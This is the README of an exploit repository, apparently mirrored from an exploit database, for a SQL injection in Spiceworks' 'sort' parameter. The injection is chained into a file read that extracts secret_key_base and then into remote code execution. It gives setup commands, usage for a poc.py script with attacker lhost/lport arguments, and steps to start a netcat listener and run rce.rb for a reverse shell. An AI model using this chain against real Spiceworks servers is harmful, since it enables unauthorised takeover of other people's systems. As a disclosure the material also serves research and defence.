## https://sploitus.com/exploit?id=16E65B65-F472-51EC-A9BF-D9E5EC12EF5D
# Spiceworks Sort SQLi
There's a SQLi in a `sort` parameter of Spiceworks. The full exploit chain is SQLi -> file read -> RCE.
## Demo
[![asciicast](https://asciinema.org/a/yOhUguVcK0brlITWq8t9DLL7J.svg)](https://asciinema.org/a/yOhUguVcK0brlITWq8t9DLL7J?t=5:30)
## Prerequisites
```bash
apt update && apt install -y ruby-dev nodejs python3 python3-pip libsqlite3-dev
pip3 install requests
gem install bundler && cd rce && bundle install
```
## Stage 1
Use `poc.py` to exploit the SQLi -> file read and extract the secret_key_base environment variable. It will then generate a PoC ruby script to gain a reverse shell, with the values obtained from `poc.py`.
### Usage
```
usage: poc.py [-h] --rhost RHOST --lhost LHOST --lport LPORT -u USER -p PASSWORD [-e ENV_PATH]
There's a SQLi in a `sort` parameter of Spiceworks. The exploit chain is SQLi -> file read -> RCE.
optional arguments:
-h, --help show this help message and exit
--rhost RHOST https://example.com
--lhost LHOST 10.10.10.10
--lport LPORT 9001
-u USER, --user USER test@test.com
-p PASSWORD, --password PASSWORD
P@$$w0rd!
-e ENV_PATH, --env_path ENV_PATH
Path to environment variables
```
## Stage 2
Use `rce.rb`. Spin up a nc listener on the IP & port you provided in Stage 1, then simply:
```bash
cd rce && ruby rce.rb
```
Voila!
# Credits
- [@aidanstansfield](https://github.com/aidanstansfield)